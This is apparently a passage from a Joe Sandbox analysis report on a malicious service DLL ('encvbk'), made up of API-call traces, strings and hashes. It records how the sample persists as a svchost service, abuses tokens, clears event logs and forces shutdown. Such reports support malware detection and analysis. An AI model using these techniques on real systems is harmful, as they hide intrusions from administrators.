                                                                                          • GetProcAddress.KERNEL32(74DD0000,ResetEvent), ref: 10003F32
                                                                                          • GetProcAddress.KERNEL32(74DD0000,CancelIo), ref: 10003F3F
                                                                                          • GetProcAddress.KERNEL32(74DD0000,SetEvent), ref: 10003F4C
                                                                                          • GetProcAddress.KERNEL32(74DD0000,TerminateThread), ref: 10003F59
                                                                                          • GetProcAddress.KERNEL32(74DD0000,GetVersionExA), ref: 10003F66
                                                                                          • GetProcAddress.KERNEL32(74DD0000,GetExitCodeProcess), ref: 10003F73
                                                                                          • GetProcAddress.KERNEL32(74DD0000,ExpandEnvironmentStringsA), ref: 10003F80
                                                                                          • GetProcAddress.KERNEL32(74DD0000,GetSystemInfo), ref: 10003F8D
                                                                                          • GetProcAddress.KERNEL32(74DD0000,GetSystemDirectoryA), ref: 10003F9A
                                                                                          • GetProcAddress.KERNEL32(74DD0000,MoveFileA), ref: 10003FA7
                                                                                          • GetProcAddress.KERNEL32(74DD0000,MoveFileExA), ref: 10003FB4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                          • String ID: ADVAPI32.dll$CancelIo$ChangeServiceConfig2A$CloseHandle$CloseServiceHandle$ControlService$CreateEventA$CreateMutexA$CreateProcessA$CreateProcessAsUserA$CreateServiceA$DeleteService$DuplicateTokenEx$EnumWindows$ExitWindowsEx$ExpandEnvironmentStringsA$GetCurrentProcess$GetExitCodeProcess$GetFileAttributesA$GetLastError$GetModuleFileNameA$GetSystemDirectoryA$GetSystemInfo$GetTickCount$GetVersionExA$IsWindowVisible$MSVCRT.dll$MessageBoxA$MoveFileA$MoveFileExA$OpenProcessToken$OpenSCManagerA$OpenServiceA$QueryServiceStatus$RegisterServiceCtrlHandlerA$ReleaseMutex$ResetEvent$SendMessageA$SetEvent$SetServiceStatus$SetTokenInformation$Sleep$StartServiceA$TerminateThread$User32.dll$WSACleanup$WSAIoctl$WSAStartup$WTSGetActiveConsoleSessionId$WaitForSingleObject$closesocket$connect$gethostbyname$gethostname$getsockname$htons$kernel32.dll$lstrcatA$memcpy$memset$recv$select$send$setsockopt$socket$strcmp$strlen$strstr$wininet.dll$ws2_32.dll$wsprintfA
                                                                                          • API String ID: 2238633743-2593546367
                                                                                          • Opcode ID: c0ece4e7efd5b4c6edabd0fb5669f7d958223cf09bcca4ca1208277cbc57487f
                                                                                          • Instruction ID: 1d4e4a84f7054c9bea1b663399dca5a43fab5260fb22e9cb011038ddc9d5f956
                                                                                          • Opcode Fuzzy Hash: c0ece4e7efd5b4c6edabd0fb5669f7d958223cf09bcca4ca1208277cbc57487f
                                                                                          • Instruction Fuzzy Hash: F5B16970800B45AEE731AF32CD04EA7BEF6FF84340B118D2DE5AA56924DB32A855DF51

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • strncpy.MSVCRT ref: 1000338C
                                                                                          • wcstombs.MSVCRT ref: 1000339C
                                                                                          • RegisterServiceCtrlHandlerA.ADVAPI32(?,100032F7), ref: 100033B1
                                                                                          • FreeConsole.KERNEL32 ref: 100033C6
                                                                                            • Part of subcall function 1000318A: SetServiceStatus.SECHOST(00000010), ref: 100031CA
                                                                                          • GetVersionExA.KERNEL32(?), ref: 100033F3
                                                                                          • MainThread.6795234 ref: 1000340F
                                                                                            • Part of subcall function 1000315D: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10003178
                                                                                            • Part of subcall function 1000315D: CloseHandle.KERNEL32(00000000), ref: 1000317F
                                                                                          • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 10003426
                                                                                          • lstrcatA.KERNEL32(?,1000660C), ref: 10003438
                                                                                          • lstrcatA.KERNEL32(?,encvbk), ref: 1000344A
                                                                                          • lstrcatA.KERNEL32(?,.exe), ref: 1000345C
                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000346A
                                                                                          • lstrcatA.KERNEL32(?,\Rundll32.exe), ref: 1000347C
                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 10003492
                                                                                          • GetFileAttributesA.KERNELBASE(?), ref: 1000349F
                                                                                          • GetLastError.KERNEL32 ref: 100034AA
                                                                                          • wsprintfA.USER32 ref: 100034C3
                                                                                          • GetModuleFileNameA.KERNEL32(?,00000104), ref: 100034DE
                                                                                          • wsprintfA.USER32 ref: 100034FE
                                                                                          • Sleep.KERNELBASE(000003E8), ref: 1000350C
                                                                                          • GetExitCodeProcess.KERNELBASE(00000000,?), ref: 10003517
                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 10003527
                                                                                          • Sleep.KERNELBASE(00000BB8), ref: 10003532
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10003559
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 10003560
                                                                                          • Sleep.KERNEL32(00000064), ref: 10003568
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: lstrcat$CloseFileHandleSleep$DirectoryObjectServiceSingleWaitwsprintf$AttributesCodeConsoleCopyCtrlCurrentErrorExitFreeHandlerLastMainModuleNameProcessRegisterStatusSystemThreadVersionstrncpywcstombs
                                                                                          • String ID: %s "%s",MainThread$.exe$\Rundll32.exe$encvbk
                                                                                          • API String ID: 2268562214-3132388857
                                                                                          • Opcode ID: edc6bb86fa15e14382b8bf422a5a5e13054f2286661d091575d839084948f042
                                                                                          • Instruction ID: 41d25408302aabc459f6968b7f59f59ff79b25a4c4978eb5c8748b31ff7b5c46
                                                                                          • Opcode Fuzzy Hash: edc6bb86fa15e14382b8bf422a5a5e13054f2286661d091575d839084948f042
                                                                                          • Instruction Fuzzy Hash: 06515275800269AFEB11DBA0CCC99DF77BEEB09395F604465F209D2058DB719A84CF61

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • LoadLibraryA.KERNELBASE(userenv.dll,00000000,00000104,00000000), ref: 10001FCB
                                                                                          • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 10001FDA
                                                                                          • memset.MSVCRT ref: 10001FF9
                                                                                          • memset.MSVCRT ref: 10002005
                                                                                          • GetCurrentProcess.KERNEL32 ref: 10002023
                                                                                          • OpenProcessToken.ADVAPI32(00000000,000F01FF,10003544), ref: 10002033
                                                                                          • DuplicateTokenEx.ADVAPI32(10003544,02000000,00000000,00000001,00000001,?), ref: 1000204A
                                                                                          • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 10002069
                                                                                          • CreateProcessAsUserA.KERNELBASE(?,00000000,10003544,00000000,00000000,00000000,00000430,?,00000000,?,?), ref: 10002094
                                                                                          • CloseHandle.KERNEL32(?), ref: 100020A0
                                                                                          • CloseHandle.KERNEL32(10003544), ref: 100020A9
                                                                                          • FreeLibrary.KERNELBASE(?), ref: 100020BB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$CloseHandleLibrarymemset$AddressCreateCurrentDuplicateFreeInformationLoadOpenProcUser
                                                                                          • String ID: CreateEnvironmentBlock$WinSta0\Default$userenv.dll
                                                                                          • API String ID: 389336417-1779146383

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 34 1000318a-100031d1 SetServiceStatus
                                                                                          APIs
                                                                                          • SetServiceStatus.SECHOST(00000010), ref: 100031CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: ServiceStatus
                                                                                          • String ID:
                                                                                          • API String ID: 3969395364-0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • wsprintfA.USER32 ref: 1000306C
                                                                                          • strlen.MSVCRT ref: 10003078
                                                                                          • strlen.MSVCRT ref: 1000308E
                                                                                            • Part of subcall function 10004A93: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,00000000,?), ref: 10004AC0
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 10004AD7
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 10004AE2
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 10004AED
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 10004AF8
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 10004B03
                                                                                            • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 10004B0E
                                                                                            • Part of subcall function 10004A93: FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 10004C02
                                                                                          • strlen.MSVCRT ref: 100030B4
                                                                                          • GetLocalTime.KERNEL32(?), ref: 100030D7
                                                                                          • wsprintfA.USER32 ref: 100030FF
                                                                                          • strlen.MSVCRT ref: 1000310D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: AddressProc$strlen$Librarywsprintf$FreeLoadLocalTime
                                                                                          • String ID: %4d-%.2d-%.2d %.2d:%.2d$Default$Group$InstallTime$Remark$SYSTEM\CurrentControlSet\Services\%s$encvbk
                                                                                          • API String ID: 124699875-3400510970

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,?,00000000), ref: 10001B96
                                                                                          • _local_unwind2.MSVCRT ref: 10001BA9
                                                                                          • CreateServiceA.ADVAPI32(00000000,00000000,00000000,000F01FF,?,10001E9B,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000), ref: 10001BE6
                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 10001BF5
                                                                                          • OpenServiceA.ADVAPI32(10001E9B,00000000,000F01FF,?,00000000), ref: 10001C09
                                                                                          • StartServiceA.ADVAPI32(00000000,00000000,00000000,?,00000000), ref: 10001C1F
                                                                                          • ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?,?,00000000), ref: 10001C43
                                                                                          • ChangeServiceConfig2A.ADVAPI32(00000000,00000002,?), ref: 10001CA3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Service$ChangeConfig2Open$CreateErrorLastManagerStart_local_unwind2
                                                                                          • String ID: Description$SYSTEM\CurrentControlSet\Services\%s
                                                                                          • API String ID: 1109860625-2908613140
                                                                                          APIs
                                                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,encvbk,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001A54
                                                                                          • OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001A69
                                                                                          • StartServiceA.ADVAPI32(00000000,00000000,00000000,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001A7A
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,10003043,encvbk), ref: 10001A84
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001A92
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001AA0
                                                                                          • Sleep.KERNEL32(00000064), ref: 10001AB2
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001ABB
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10003043,encvbk), ref: 10001AC2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ErrorLastManagerQuerySleepStartStatus
                                                                                          • String ID: encvbk
                                                                                          • API String ID: 191932718-1002245020
                                                                                          APIs
                                                                                          • strlen.MSVCRT ref: 10002BD1
                                                                                          • memset.MSVCRT ref: 10002BEF
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 10004857
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 1000486A
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 10004878
                                                                                            • Part of subcall function 10004822: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004885
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                            • Part of subcall function 10004822: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004A63
                                                                                          • lstrlenA.KERNEL32(?), ref: 10002C1E
                                                                                          • strstr.MSVCRT ref: 10002C34
                                                                                          • lstrcpyA.KERNEL32(00000000,?), ref: 10002C44
                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10002C8A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: AddressProc$memset$Library$CreateFreeLoadProcesslstrcpylstrlenstrlenstrstr
                                                                                          • String ID: Applications\iexplore.exe\shell\open\command$D$WinSta0\Default
                                                                                          • API String ID: 2952214944-490771695
                                                                                          APIs
                                                                                          • OpenEventLogA.ADVAPI32(00000000,Application), ref: 100026B8
                                                                                          • ClearEventLogA.ADVAPI32(00000000,00000000), ref: 100026C7
                                                                                          • CloseEventLog.ADVAPI32(00000000), ref: 100026CE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Event$ClearCloseOpen
                                                                                          • String ID: (b$Application$Security$System
                                                                                          • API String ID: 1391105993-346596376
                                                                                          APIs
                                                                                          • strlen.MSVCRT ref: 10001F4E
                                                                                            • Part of subcall function 10001ACF: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10001ADF
                                                                                            • Part of subcall function 10001ACF: OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10001AF5
                                                                                            • Part of subcall function 10001ACF: QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B06
                                                                                            • Part of subcall function 10001ACF: ControlService.ADVAPI32(00000000,00000001,?), ref: 10001B1D
                                                                                            • Part of subcall function 10001ACF: Sleep.KERNEL32(0000000A), ref: 10001B2F
                                                                                            • Part of subcall function 10001ACF: QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B3A
                                                                                            • Part of subcall function 10001ACF: CloseServiceHandle.ADVAPI32(00000000), ref: 10001B43
                                                                                            • Part of subcall function 10001ACF: CloseServiceHandle.ADVAPI32(00000000), ref: 10001B4A
                                                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,?,?,?,?,10002F76,encvbk), ref: 10001F6B
                                                                                          • OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,?,10002F76,encvbk), ref: 10001F7F
                                                                                          • DeleteService.ADVAPI32(00000000,?,?,?,?,10002F76,encvbk), ref: 10001F8C
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,10002F76,encvbk), ref: 10001F93
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,10002F76,encvbk), ref: 10001F9A
                                                                                          Strings
                                                                                          • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 10001FA7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandleOpen$ManagerQueryStatus$ControlDeleteSleepstrlen
                                                                                          • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
                                                                                          • API String ID: 625463800-1784019800
                                                                                          • Opcode ID: 02807cd9fc2c2d172a8d2777ce926d73bc9f3961fff41b6754e738332fe71101
                                                                                          • Instruction ID: 320e00f64ca60edd69a113f9dbbd44adb98dc69d7bce9bbf9f1d19ab5e200103
                                                                                          • Opcode Fuzzy Hash: 02807cd9fc2c2d172a8d2777ce926d73bc9f3961fff41b6754e738332fe71101
                                                                                          • Instruction Fuzzy Hash: 39F096B610912A7FF1106771ECCCDBF7E6DDB4E2D6B120428F5055600ECF2658418571
                                                                                          APIs
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 10004857
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 1000486A
                                                                                            • Part of subcall function 10004822: memset.MSVCRT ref: 10004878
                                                                                            • Part of subcall function 10004822: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004885
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                            • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                            • Part of subcall function 10004822: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004A63
                                                                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 100035C9
                                                                                          • wsprintfA.USER32 ref: 100035DE
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: AddressProc$memset$Library$FreeInfoLoadSystemwsprintf
                                                                                          • String ID: %d*%sMHz$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                                                                                          • API String ID: 86330591-2169120903
                                                                                          • Opcode ID: dc211f4c5e3334b9a75a581acafed69773f2644d7a1948e9a9c8f06f08de0db5
                                                                                          • Instruction ID: e0e52339f3a0edf701dd4b0822ed73eda2d577ef34cae91861143d544cce4ff8
                                                                                          • Opcode Fuzzy Hash: dc211f4c5e3334b9a75a581acafed69773f2644d7a1948e9a9c8f06f08de0db5
                                                                                          • Instruction Fuzzy Hash: 93F054B1900149BFFB04DBE8CD05DEEBB6DDB1C144F200464FB01F5055E6629A148766
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(?,00000000,?,?,100039AB,00000000), ref: 10003D99
                                                                                          • free.MSVCRT ref: 10003DA8
                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,100039AB,00000000), ref: 10003DBE
                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,100039AB,00000000), ref: 10003DC6
                                                                                          • HeapFree.KERNEL32(00000000), ref: 10003DCD
                                                                                          Similarity
                                                                                          • API ID: Free$Heap$LibraryProcessVirtualfree
                                                                                          • String ID:
                                                                                          • API String ID: 831075735-0
                                                                                          • Opcode ID: 667178307696715c23ee8a0b861fe9ca313d72f521eb66f714d6403ad810cf37
                                                                                          • Instruction ID: 71511c0ad6a298159b0eec715adc94005effd13d7d75cd72595928e5cffca51a
                                                                                          • Opcode Fuzzy Hash: 667178307696715c23ee8a0b861fe9ca313d72f521eb66f714d6403ad810cf37
                                                                                          • Instruction Fuzzy Hash: DC01ED72500611AFE7219FA5DCC895BB7EDFB443A1311892EF19A93554C731BC45CB50
                                                                                          APIs
                                                                                          • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10001581
                                                                                          • memset.MSVCRT ref: 10001599
                                                                                          • recv.WS2_32(?,?,00002000,00000000), ref: 100015B0
                                                                                            • Part of subcall function 10001603: __EH_prolog.LIBCMT ref: 10001608
                                                                                            • Part of subcall function 10001603: memcmp.MSVCRT(?,?,00000003,00000000,00000000,00002000), ref: 10001635
                                                                                          Similarity
                                                                                          • API ID: H_prologmemcmpmemsetrecvselect
                                                                                          • String ID:
                                                                                          • API String ID: 845096623-0
                                                                                          • Opcode ID: 75ccf4472247f99d1fc82cf152b3949a0f6c798424c0c4ef67da7dbc52851d33
                                                                                          • Instruction ID: b249bad086b58afcbe69b5c97c14a2d47d410cce536c228878a31608307147f8
                                                                                          • Opcode Fuzzy Hash: 75ccf4472247f99d1fc82cf152b3949a0f6c798424c0c4ef67da7dbc52851d33
                                                                                          • Instruction Fuzzy Hash: E3216376500128ABEB20CBA5DC88DCF7BADEF853E1F100565F51A9B195DB30AE85CA90
                                                                                          APIs
                                                                                            • Part of subcall function 10004666: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,SeShutdownPrivilege), ref: 1000467E
                                                                                            • Part of subcall function 10004666: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1000468E
                                                                                            • Part of subcall function 10004666: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 10004699
                                                                                            • Part of subcall function 10004666: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 100046A4
                                                                                            • Part of subcall function 10004666: LoadLibraryA.KERNEL32(kernel32.dll,?,SeShutdownPrivilege), ref: 100046AE
                                                                                            • Part of subcall function 10004666: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 100046B9
                                                                                            • Part of subcall function 10004666: LoadLibraryA.KERNEL32(KERNEL32.dll,?,SeShutdownPrivilege), ref: 10004701
                                                                                            • Part of subcall function 10004666: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 10004709
                                                                                            • Part of subcall function 10004666: CloseHandle.KERNEL32(?,?,SeShutdownPrivilege), ref: 10004718
                                                                                            • Part of subcall function 10004666: FreeLibrary.KERNEL32(00000000,?,SeShutdownPrivilege), ref: 10004729
                                                                                            • Part of subcall function 10004666: FreeLibrary.KERNEL32(00000000,?,SeShutdownPrivilege), ref: 10004734
                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 100025B8
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProc$Load$Free$CloseExitHandleWindows
                                                                                          • String ID: SeShutdownPrivilege
                                                                                          • API String ID: 3789203340-3733053543
                                                                                          • Opcode ID: e4fba66ba179fd9c90d11779b271753c7a602678899a700a7ffa0e43bc127d12
                                                                                          • Instruction ID: 24361d1f74b491916104d0b65e9654eb6268adfd09238d66ad51a9c89c1c7c7a
                                                                                          • Opcode Fuzzy Hash: e4fba66ba179fd9c90d11779b271753c7a602678899a700a7ffa0e43bc127d12
                                                                                          • Instruction Fuzzy Hash: 55D0C93614D7203AF6259310FC07F891386DB46A60F32005AF100281D9EE97394101DE

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • memset.MSVCRT ref: 10004857
                                                                                          • memset.MSVCRT ref: 1000486A
                                                                                          • memset.MSVCRT ref: 10004878
                                                                                          • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004885
                                                                                          • GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                          • GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                          • GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                          • GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                          • GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                          • strchr.MSVCRT ref: 10004991
                                                                                          • lstrcpyA.KERNEL32(?,?,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004A3F
                                                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002256,00000144,00000000), ref: 10004A63
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: AddressProc$memset$Library$FreeLoadlstrcpystrchr
                                                                                          • String ID: %08X$ADVAPI32.dll$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA
                                                                                          • API String ID: 3659255042-2913591164
                                                                                          • Opcode ID: 7424f0aa0fc5f41e5269731e09dcfb498a038a30a4bf35bef428207efb807e24
                                                                                          • Instruction ID: 7827c6d97ea14ff7f97f876e2ede93deda3ff4f1abfb71c7f8a3dc5e2b71a7d8
                                                                                          • Opcode Fuzzy Hash: 7424f0aa0fc5f41e5269731e09dcfb498a038a30a4bf35bef428207efb807e24
                                                                                          • Instruction Fuzzy Hash: 3761F9B190111DABEF21DFA0CD84EEFBBB9FB49390F1101A6F609A2114DB319E548F65

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: memset$lstrcatstrrchrstrstr$CreateEnvironmentExpandProcessStringslstrcpystrcpystrlenstrncpywsprintf
                                                                                          • String ID: "%1$%s\shell\open\command$D$WinSta0\Default
                                                                                          • API String ID: 4079107157-33419044
                                                                                          • Opcode ID: 04d3fabc052defb42953b4d487a01b0e0a3a75e7128b93fa4fdb2158ee315547
                                                                                          • Instruction ID: 1dae266835ad86fc393f082bb566385ae5bfce16840cf251a65e311cd9e83007
                                                                                          • Opcode Fuzzy Hash: 04d3fabc052defb42953b4d487a01b0e0a3a75e7128b93fa4fdb2158ee315547
                                                                                          • Instruction Fuzzy Hash: 86514FB690062DBFFB10CBE0CD89EDF777CEB05395F1044A6F604E6144DA719A498BA0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,SeShutdownPrivilege), ref: 1000467E
                                                                                          • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 1000468E
                                                                                          • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 10004699
                                                                                          • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 100046A4
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,SeShutdownPrivilege), ref: 100046AE
                                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 100046B9
                                                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,?,SeShutdownPrivilege), ref: 10004701
                                                                                          • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 10004709
                                                                                          • CloseHandle.KERNEL32(?,?,SeShutdownPrivilege), ref: 10004718
                                                                                          • FreeLibrary.KERNEL32(00000000,?,SeShutdownPrivilege), ref: 10004729
                                                                                          • FreeLibrary.KERNEL32(00000000,?,SeShutdownPrivilege), ref: 10004734
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProc$Load$Free$CloseHandle
                                                                                          • String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$SeShutdownPrivilege$kernel32.dll
